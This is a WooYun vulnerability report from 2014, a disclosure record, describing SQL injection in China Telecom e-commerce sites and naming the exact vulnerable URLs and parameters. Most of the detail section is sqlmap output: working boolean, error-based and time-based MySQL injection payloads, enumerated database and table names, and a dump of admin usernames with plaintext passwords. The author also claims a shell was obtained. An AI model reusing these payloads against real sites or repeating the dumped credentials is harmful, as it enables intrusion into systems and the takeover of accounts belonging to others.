当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078544

漏洞标题:电信某商城SQL注入漏洞直接获取root

相关厂商:中国电信

漏洞作者: 老和尚

提交时间:2014-10-10 14:37

修复时间:2014-11-24 14:38

公开时间:2014-11-24 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-10: 细节已通知厂商并且等待厂商处理中
2014-10-14: 厂商已经确认,细节仅向厂商公开
2014-10-24: 细节向核心白帽子及相关领域专家公开
2014-11-03: 细节向普通白帽子公开
2014-11-13: 细节向实习白帽子公开
2014-11-24: 细节向公众公开

简要描述:

老和尚:电信施主,你东西掉了
电信:啥子东西哟
老和尚;一大堆洞洞
电信:卧槽。帮我捡一下
老和尚:出家人慈悲为怀,不贵。998
电信:你大爷,咱们乌云见.....

详细说明:

漏洞存在页面:http://www.yiliangoo.com/search.php?g=0&b=0&c=&s=0&k=%27
还有北京翼商城的已经发出来漏洞,也没有修复我也列出来了。
http://www.ego10000.com/search.php?b=687&c=1'%22&g=703
http://www.ego10000.com/ajax_check_user.php?email=
在附上一个爆路径:http://ego10000.com/includes/footer.php
存在注入参数是:c
1.。直接注入出来数据之后呢。然后用

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: email
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: email=1%' RLIKE (SELECT (CASE WHEN (4400=4400) THEN 1 ELSE 0x28 END
)) AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: email=1%' AND (SELECT 2861 FROM(SELECT COUNT(*),CONCAT(0x7176717171
,(SELECT (CASE WHEN (2861=2861) THEN 1 ELSE 0 END)),0x716c617271,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: email=1%' AND 1288=BENCHMARK(5000000,MD5(0x4b6e6c79)) AND '%'='
---
[10:41:29] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0
[10:41:29] [INFO] fetching database names
[10:41:29] [WARNING] reflective value(s) found and filtering out
[10:41:29] [INFO] the SQL query used returns 11 entries
[10:41:29] [INFO] retrieved: information_schema
[10:41:29] [INFO] retrieved: dspam
[10:41:29] [INFO] retrieved: ego10000
[10:41:30] [INFO] retrieved: ego10000_bak
[10:41:30] [INFO] retrieved: extmail
[10:41:30] [INFO] retrieved: hallylure
[10:41:30] [INFO] retrieved: mysql
[10:41:30] [INFO] retrieved: shopstit
[10:41:30] [INFO] retrieved: stit_v3
[10:41:30] [INFO] retrieved: test
[10:41:30] [INFO] retrieved: ybzdb
available databases [11]:
[*] dspam
[*] ego10000
[*] ego10000_bak
[*] extmail
[*] hallylure
[*] information_schema
[*] mysql
[*] shopstit
[*] stit_v3
[*] test
[*] ybzdb
[10:41:30] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\www.yiliangoo.com'
[*] shutting down at 10:41:30
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: email
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: email=1%' RLIKE (SELECT (CASE WHEN (4400=4400) THEN 1 ELSE 0x28 END
)) AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: email=1%' AND (SELECT 2861 FROM(SELECT COUNT(*),CONCAT(0x7176717171
,(SELECT (CASE WHEN (2861=2861) THEN 1 ELSE 0 END)),0x716c617271,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: email=1%' AND 1288=BENCHMARK(5000000,MD5(0x4b6e6c79)) AND '%'='
---
[10:53:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0
[10:53:22] [INFO] fetching tables for database: 'stit_v3'
[10:53:22] [WARNING] reflective value(s) found and filtering out
[10:53:22] [INFO] the SQL query used returns 45 entries
[10:53:23] [INFO] retrieved: act_award_info
[10:53:23] [INFO] retrieved: act_user_award_info
[10:53:23] [INFO] retrieved: activityinfo
[10:53:23] [INFO] retrieved: ad_info
[10:53:23] [INFO] retrieved: admingroup
[10:53:23] [INFO] retrieved: adminmenu
[10:53:23] [INFO] retrieved: adminuser
[10:53:23] [INFO] retrieved: ask_goods_info
[10:53:24] [INFO] retrieved: attribute_class_info
[10:53:24] [INFO] retrieved: attribute_class_select_value_info
[10:53:24] [INFO] retrieved: attribute_value_info
[10:53:27] [INFO] retrieved: class_info
[10:53:27] [INFO] retrieved: create_html
[10:53:27] [INFO] retrieved: dispatch_mode_info
[10:53:27] [INFO] retrieved: dispatch_pay_mutuality_info
[10:53:30] [INFO] retrieved: gift_info
[10:53:30] [INFO] retrieved: gift_order
[10:53:30] [INFO] retrieved: goods_fav
[10:53:30] [INFO] retrieved: goods_fitting_mutuality_info
[10:53:30] [INFO] retrieved: goods_image_info
[10:53:30] [INFO] retrieved: goods_info
[10:53:30] [INFO] retrieved: goods_more_info
[10:53:31] [INFO] retrieved: goods_mutuality_info
[10:53:31] [INFO] retrieved: goods_taocan
[10:53:31] [INFO] retrieved: goods_taocan_attr
[10:53:32] [INFO] retrieved: goods_taocan_value
[10:53:32] [INFO] retrieved: gp_class
[10:53:32] [INFO] retrieved: news
[10:53:32] [INFO] retrieved: notice
[10:53:32] [INFO] retrieved: order_detail_info
[10:53:33] [INFO] retrieved: order_info
[10:53:33] [INFO] retrieved: order_network
[10:53:33] [INFO] retrieved: rcmdgoods
[10:53:33] [INFO] retrieved: repair
[10:53:33] [INFO] retrieved: search_log
[10:53:36] [INFO] retrieved: shop_basket
[10:53:39] [INFO] retrieved: sms
[10:53:39] [INFO] retrieved: tel_number
[10:53:39] [INFO] retrieved: tel_taocan_value
[10:53:40] [INFO] retrieved: tel_type
[10:53:40] [INFO] retrieved: tel_type_template
[10:53:40] [INFO] retrieved: tel_type_template_attr
[10:53:40] [INFO] retrieved: telnumber
[10:53:40] [INFO] retrieved: usercent
[10:53:40] [INFO] retrieved: userinfo
Database: stit_v3
[45 tables]
+-----------------------------------+
| act_award_info                    |
| act_user_award_info               |
| activityinfo                      |
| ad_info                           |
| admingroup                        |
| adminmenu                         |
| adminuser                         |
| ask_goods_info                    |
| attribute_class_info              |
| attribute_class_select_value_info |
| attribute_value_info              |
| class_info                        |
| create_html                       |
| dispatch_mode_info                |
| dispatch_pay_mutuality_info       |
| gift_info                         |
| gift_order                        |
| goods_fav                         |
| goods_fitting_mutuality_info      |
| goods_image_info                  |
| goods_info                        |
| goods_more_info                   |
| goods_mutuality_info              |
| goods_taocan                      |
| goods_taocan_attr                 |
| goods_taocan_value                |
| gp_class                          |
| news                              |
| notice                            |
| order_detail_info                 |
| order_info                        |
| order_network                     |
| rcmdgoods                         |
| repair                            |
| search_log                        |
| shop_basket                       |
| sms                               |
| tel_number                        |
| tel_taocan_value                  |
| tel_type                          |
| tel_type_template                 |
| tel_type_template_attr            |
| telnumber                         |
| usercent                          |
| userinfo                          |
+-----------------------------------+
[10:53:40] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\www.yiliangoo.com'
[*] shutting down at 10:53:40


Table: adminuser
[5 entries]
+----------+--------------+
| username | userpassword |
+----------+--------------+
| jon      | 111          |
| wlj      | 111          |
| ??       | 123          |
| ???      | 123          |
| ???      | 123          |
+----------+--------------+


漏洞证明:

已GETSHELL

QQ图片20140407140909.jpg


QQ图片20140407140957.jpg


修复方案:

过滤参数,密码修改复杂一点,多注重下安全把。

版权声明:转载请注明来源 老和尚@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-10-14 17:38

厂商回复:

最新状态:

暂无